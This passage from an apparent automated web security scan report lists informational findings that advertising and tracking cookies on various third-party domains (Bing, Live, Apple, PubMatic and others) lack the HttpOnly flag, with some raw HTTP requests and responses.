The following cookie was issued by the application and does not have the HttpOnly flag set:

MUID=E361C23374E642C998D8ABA7166A75EC; domain=.atdmt.com; expires=Wed, 08-Feb-2012 02:08:47 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.75. http://c.bing.com/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.bing.com
Path:	/c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MUID=E361C23374E642C998D8ABA7166A75EC&TUID=1; domain=.bing.com; expires=Wed, 08-Feb-2012 02:08:28 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.76. http://c.live.com/c.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.live.com
Path:	/c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

MUID=1A89D03C0A4769473AE9D2040E476929&TUID=1; domain=.live.com; expires=Wed, 08-Feb-2012 04:40:54 GMT; path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.77. http://ce.lijit.com/merge previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ce.lijit.com
Path:	/merge

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ljtrtb=eJyrVjJSslJyNXYzNnJyMbA0NTFztjRxcXSxNHUxdDI1MTA0NHBWqgUAp3QIqg%3D%3D; expires=Sun, 22-Jul-2012 04:49:16 GMT; path=/; domain=.lijit.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.78. http://cf.addthis.com/red/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cf.addthis.com
Path:	/red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

di=1311255774.10R|1311255774.1FE|1311255774.19F|1311255774.1OD|1311255774.60|1311255774.1EY; Domain=.addthis.com; Expires=Mon, 22-Jul-2013 13:15:17 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.79. http://clients.mobilecause.com/lists/1227/subscriptions/web.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clients.mobilecause.com
Path:	/lists/1227/subscriptions/web.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uniq_id=1311426926.44707; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.80. http://clk.atdmt.com/goiframe/222276744/331989646/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/goiframe/222276744/331989646/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ach00=ceda/2b295:ceda/2b2a4; expires=Saturday, 20-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=d54f77d/2b295/13ea5bb9/ceda/4e28638a:d3fac88/2b2a4/13c9c28e/ceda/4e286642; expires=Saturday, 20-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.81. http://clk.atdmt.com/goiframe/223672189/334126009/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/goiframe/223672189/334126009/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ach00=ceda/2b295; expires=Saturday, 20-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=d54f77d/2b295/13ea5bb9/ceda/4e28638a; expires=Saturday, 20-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.82. http://cms.quantserve.com/dpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cms.quantserve.com
Path:	/dpixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=ECgAFPaeApll_6ix7sIBpAEBpQeBkgoprR8sjB9uThwijEh-6RmBqyqBg5gc4V0eENEOENHLSUKIEPcOEQfIEZoQ5U8w0bswpeFAMFBIRfM9FOEA_VrB-JLzCEAMhLIQ_OHC; expires=Fri, 21-Oct-2011 14:52:39 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.83. http://code.msdn.microsoft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.msdn.microsoft.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:46:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.84. http://code.msdn.microsoft.com/globalresources/scripts/ms2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.msdn.microsoft.com
Path:	/globalresources/scripts/ms2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:47:38 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.85. http://code.msdn.microsoft.com/site/upload previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.msdn.microsoft.com
Path:	/site/upload

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:47:53 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.86. http://community.spiceworks.com/r/595 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.spiceworks.com
Path:	/r/595

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

swcls=173.193.214.243.1311280492510052; path=/; domain=.spiceworks.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.87. http://content.mkt51.net/lp/static/js/iMAWebCookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.mkt51.net
Path:	/lp/static/js/iMAWebCookie.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerP5-CONTENT-8004=219117578.17439.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/static/js/iMAWebCookie.js?1a8b3ca-1267bb7dbd6-c6f842ded9e6d11c5ffebd715e129037&h=www.pages05.net HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: content.mkt51.net

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 19:55:46 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 18:43:24 GMT
ETag: "2e9e-4d9b-4a898b94a6b00"
Accept-Ranges: bytes
Content-Length: 19867
Connection: close
Content-Type: application/x-javascript
Set-Cookie: BIGipServerP5-CONTENT-8004=219117578.17439.0000; path=/

/*
* CONFIDENTIAL AND PROPRIETARY
* Copyright 2010 Silverpop Systems, Inc. All rights reserved.
* The contents of this material are confidential and proprietary to
* Silverpop Systems, Inc.
...[SNIP]...

11.88. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextlinks.netseer.com
Path:	/dsatserving2/servlet/BannerServer

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fd99cd273cceae2,1311276179748,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:22:59 GMT; Path=/
netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:22:59 GMT; Path=/
netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276179749,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvaG93X3RvX3F1aWV0X3RoZV9zeW1wdG9tc19vZl9hZHVsdF9hZGhkLmFzcHg,US-TX-623-Dallas,0,0"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:22:59 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dsatserving2/servlet/BannerServer?tagid=1494&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fk%3B227818253%3B0-0%3B0%3B31210306%3B748-470%2F60%3B37939276%2F37957052%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3Dpencil%3Btile%3D20%3B~sscs%3D%3F&rfd=www.lifescript.com&adh=60&adw=470&frd=1311276185290 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;sz=470x60;ord=101352252258050

Response

11.89. http://cspix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cspix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

clid=2looqmz01170z25a5jiwl0gq03ouk00b5o020u0b70b; Domain=media6degrees.com; Expires=Thu, 19-Jan-2012 13:15:19 GMT; Path=/
vstcnt=41a6010r024ef19118e10024fliz118e1002; Domain=media6degrees.com; Expires=Thu, 19-Jan-2012 13:15:19 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.90. http://d.101m3.com/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.101m3.com
Path:	/afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=3b07da8ac3b687db9a32c81a95750924; expires=Sun, 22-Jul-2012 02:07:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afr.php?zoneid=2&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/magazine/ee336135.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

11.91. http://d.101m3.com/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.101m3.com
Path:	/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=b27bc7b6d7ff12decb51afccaa9f7de4; expires=Sun, 22-Jul-2012 02:07:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=258&campaignid=176&zoneid=2&loc=http%3A%2F%2Fmsdn.microsoft.com%2Fen-us%2Fmagazine%2Fee336135.aspx&cb=6689e0df26&r_id=d1bc4048d743dc91f7ebbce66ad9ecd8&r_ts=lorkkw HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://d.101m3.com/afr.php?zoneid=2&cb=INSERT_RANDOM_NUMBER_HERE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=b27bc7b6d7ff12decb51afccaa9f7de4

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 02:07:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=b27bc7b6d7ff12decb51afccaa9f7de4; expires=Sun, 22-Jul-2012 02:07:50 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.92. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4146544210108361256/mchpid/3/url/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/dm/mkt/73/mpid//mpuid/4146544210108361256/mchpid/3/url/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=3197465033032759420; Domain=.audienceiq.com; Expires=Tue, 17-Jan-2012 18:42:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.93. http://forums.vostu.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.vostu.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Az_lastvisit=1311275629; expires=Fri, 20-Jul-2012 19:13:49 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.94. http://forums.vostu.com/forums/41-Como-Jogar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.vostu.com
Path:	/forums/41-Como-Jogar

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Az_forum_view=7139c26eb82c8e78808f0b999029d51072882d5ca-1-%7Bi-41_i-1311275659_%7D; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.95. http://greatpondsma.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://greatpondsma.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WebPersCookie=zC/M5NpmLbjd6GW88w7usH+6wdXqHtGBrBXpo1yr31QCrS8MOIczMNpjK+wVJRd/2tnCSfCHXf29y3M=; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: greatpondsma.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Set-Cookie: JSESSIONID=D1E8B3617FA9F537D02D22930A25BB52.web125; Path=/; HttpOnly
X-ServedBy: web125
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://www.greatpondsma.org/
Content-Type: text/html
Content-Length: 0
Date: Sat, 23 Jul 2011 13:10:14 GMT
Server: SSWS
Set-Cookie: WebPersCookie=zC/M5NpmLbjd6GW88w7usH+6wdXqHtGBrBXpo1yr31QCrS8MOIczMNpjK+wVJRd/2tnCSfCHXf29y3M=; path=/

11.96. http://home.live.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.live.com
Path:	/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

E=P:0B3c+wkXzog=:owBaSuE89cZK/T/ADgs5WcoVfC7zm9cBrz4tVkiAY0I=:F; domain=.live.com; path=/
wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJ5MioxLDUxMEE5NzRFQ0I5NEZCMzAsMSwwLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMHwxLDlDOTgzOEU4RTk1OEVGRkUsMSwsMHwxLDY5RjQwMDJDN0I3OTUzQSwxLDAsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:41:55 GMT; path=/
wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJ5MioxLDUxMEE5NzRFQ0I5NEZCMzAsMSwwLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMHwxLDlDOTgzOEU4RTk1OEVGRkUsMSwsMHwxLDY5RjQwMDJDN0I3OTUzQSwxLDAsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:41:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.97. http://home.live.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.live.com
Path:	/search/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

E=P:N72z3gkXzog=:OXoPt1c/aECEyuMTyC6Y0qFMAa+XdjrgGNA8RpVhIjI=:F; domain=.live.com; path=/
wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJ5MioxLDUxMEE5NzRFQ0I5NEZCMzAsMSwwLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMHwxLDlDOTgzOEU4RTk1OEVGRkUsMSwsMHwxLDY5RjQwMDJDN0I3OTUzQSwxLDAsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:41:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.98. http://home.live.com/search/hip previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.live.com
Path:	/search/hip

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

E=P:TdoD4AkXzog=:d82/KsN7BtzJeKTvolKzfuXRiEeEBqcRsl5Pu4gx3SU=:F; domain=.live.com; path=/
wla42=YnkyfHByb3h5LWJheS5wdnQtY29udGFjdHMubXNuLmNvbSoxLDlDOTgzOEU4RTk1OEVGRkUsMCwsMHwxLDY5RjQwMDJDN0I3OTUzQSwwLDEsMHwxLDUxMEE5NzRFQ0I5NEZCMzAsMCwxLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:41:08 GMT; path=/
wla42=YnkyfHByb3h5LWJheS5wdnQtY29udGFjdHMubXNuLmNvbSoxLDlDOTgzOEU4RTk1OEVGRkUsMCwsMHwxLDY5RjQwMDJDN0I3OTUzQSwwLDEsMHwxLDUxMEE5NzRFQ0I5NEZCMzAsMCwxLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:41:08 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.99. http://i.w55c.net/ping_match.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/ping_match.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wfivefivec=0892d3fc-c93f-4985-8ab2-420c545c19b6;Path=/;Domain=.w55c.net;Expires=Sat, 20-Jul-13 18:00:58 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.100. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sgm=9622=734271&9000=734271&570=734271&410=734329&846=734329&7472=734311&6790=734276&7434=734280&7594=734283&428=734329&11062=734336&11060=734293&8803=734339&11206=734324&7382=734325&11095=734330&10421=734339; domain=.interclick.com; expires=Thu, 22-Jul-2021 20:31:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.101. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

KRTBCOOKIE_27=1216-uid:4dc0222e-3ec1-3315-901d-9f5b34470a53; domain=pubmatic.com; expires=Sat, 20-Jul-2013 18:42:59 GMT; path=/
PUBRETARGET=2114_1326806725.82_1405863486.390_1319047268.362_1313865779; domain=pubmatic.com; expires=Sun, 20-Jul-2014 13:38:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.102. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

KRTBCOOKIE_107=1471-uid:0892d3fc-c93f-4985-8ab2-420c545c19b6; domain=pubmatic.com; expires=Sat, 20-Jul-2013 18:00:59 GMT; path=/
PUBRETARGET=2114_1326806725.82_1405863486.571_1405879259; domain=pubmatic.com; expires=Sun, 20-Jul-2014 18:00:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.103. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

KRTBCOOKIE_80=1336-2ecd6c1e-5306-444b-942d-9108b17fd086.38747.66267.38582.39303.; domain=pubmatic.com; expires=Sat, 20-Jul-2013 18:01:08 GMT; path=/
PUBRETARGET=2114_1326806725.82_1405863486.390_1319047268; domain=pubmatic.com; expires=Sun, 20-Jul-2014 13:38:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.104. http://images.apple.com/global/metrics/js/s_code_h.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/metrics/js/s_code_h.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=YPG5TuFKot1LUn+lq23wrLdlvLPUZJXpPAP21q2AZI6ybOrmCQ9ZvagVaKElnHhuLxZWILPlyU10pXqhEcXHaZA8muizMYxVUyHDxAP/1nqg7Or3wEZaQGRv2xbBSUJmA90kWKiGNAW6Uf7jiyrAIqTtFgtOeWA2YYfTbJKKJt52YHNnKf5HURbWq1GKAWWdJwNuJX/jqQEzK8RJ4TumuXXzJMQryFbRo53bGT4o5YXTEstHYlEdhotv+GFiYid8W80i+u1p++O5ZSdYF3iEuzrN9myAmXbFZrGgn5TxcGU8v9leUS7EKDYqNxvqeypQHhHbO2dc9DqxVa1LGZTPv6wiFB5gKx83rZDijFgpC4S249Tgf+zDP3cBbWAEmvi2KDdVVFonUlUfpWpd1AK3CVm/Oi98XAN+OlMwHC/CdDLWB7VyDpfX5gJd+ZmnJ1I0sLGBXu3Ns7cDz4Rj66ko8ELCLhslcfJMEh45qUnY1+KFoUzgtF1EO6KPe5w2KQbxekoRSFW6zhoc9CCfqgPX9EQI85tjSAyuM2cQWDApn7n21P5svZBUoF4SrBI9fy6L; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.105. http://images.apple.com/global/nav/scripts/globalnav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/nav/scripts/globalnav.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=cxVWFEgCbMgUgDRkyE0d4yvNVcp1ceQGZ5qMGww/wvgs3pDIJPL2naJnvuJBopZIfNrD9qdt639zRNXWNXmaJwbD/UQrX4vZnidsVeTVYZbeun3M71BwA+LwabJfNO5dX/28lpneIqPvEwwCp7hKEIawjRuoDwGPk9qbqm/0jSCSsxVteeHVaHjguRFyXJZZQLySitDGiceJt7IherIIvxJ+csWMXuRv+YN6XXawLvas1EM844mCEGdlI08LTJ/5xYmr/m0tifR7grT+OEYpPbGGbavuIw+iy1cE6lhjYIkjDsVHr6xzCr6HO3nPKVKG7i+GVjHLHUOPqoxZ6ye0zc1P0XqBgqQELdRvsivhgSL4fKt3xOtIM2+zp3+tkt4b3MH4gcY1636k6gSdKI59UjE+hji5j/ObqE8ZAtMxaQu3quev6Z1h25bMHBctf/DSkCMtLbGRb35VFwz96aXQf8NTzY45zFrpCvjJQFUm1OBwjVhLKv/0GNElSkPGtXNfCpbXNK/8nMvX4VgAknPebaaHMPYDTNoiY5fOxkR/FvjJuDgTVZylQGbarX8iHIAf; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.106. http://images.apple.com/global/nav/styles/navigation.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=mfV4tVh4dgUZVrEM7tD+7+xXOxo+NDGZjQQFY7dvAL9ehOI2edtSrU0JwrPQlxLrLfACeMJ9R/dKN+WKd9zM6sCKRkzBwLXpPHx2iZs6DT6JBfou9msW35vA+NHXgNLdv4pAmDxb1d9G1gys0Kl6KgMhMEH2nVgdmTqca6mLT1SNkCQHpF3z+VY85JeB2pQm8+Ul2UxJ9aBAoQKKZmClQk92XyID36Jahux7r0FHZ6XwIhX/hXsM+hagMCBWMlF8XDgmbelJa/y9OxJFdaP6mpk0rWu52PiW+y11mUlfT7pwuqW0E30JEmHBTxZGbKIMDWgjCrazzhfJmlkB/1jsdlQxSr3cajxsYkM6C6kX150K61jGNe825c1qYsH9hQ8vdPJY3TV2M6T9H8T1MpdUEkXTiBaHGBmii/pxuVtfGzOWmazsfd+jT+ivXDsQO9UlAifCyzt+VHS9srArldN7M5h77EhlOrtfe2sSsnBzodnuj2Bt8G/D3NGu7ROXneRRYhJh7XeATyislaVfmdQi62YmrXX9BPd6fe448U8pI1H/t3Jp0WW/OwK/9Bt8uqyu; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.107. http://images.apple.com/global/scripts/apple_core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/apple_core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ccl=6zGJJ+SbifeMK9hVAnH7zqmoyGnKztAft4oVnEoVLwCmQOp+JoTF3nEi5afg8pQUnBpi9HnlCbYehbNJ2Yui1BDeUQIVNeHr2wHheNPY7qpsuTG2q8PiM6a4lbubItM6odn2sKTVGV5gg6IBeot1SjgZPag4umq9e+AlAcEKrfxF5UIHFh7TgHBqilazsCJgXsbaWpvz7ePt6xnrFzsJGNjeaEisqfM+1NhBhPqvOxZwP4eMpIlar3rMxJcjO0i8batYun0iVZiRp1KVTzDcBZZ1uU6dW/OEcRLS2m1W4irPuQNvhqgShTMgTpx1grx0q/gHRpZA0/yD2yDxJ3ZMUX5Yf0PSbA/LwJC2qdG/xEXTBmHLCMCDM7O69qEl7aiD5qsC/4HkOvp84fCODyk5cw4ghWx0q3Rbcon15MAr1FOHbUop+7sF5VOXnSg7cmLlnF55H9v7upVz9dIVloaD9ZfzH4D9rh+2yZBgOPYawalZTTd/zxWWXta7u4V61kaJk+Mv2ho1vAAb4zDnWIxekZOuBuexbAnx281CJIx/jHA3F/Vq0847SBIpQl2NzifJ; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.108. http://images.apple.com/global/scripts/browserdetect.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/browserdetect.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

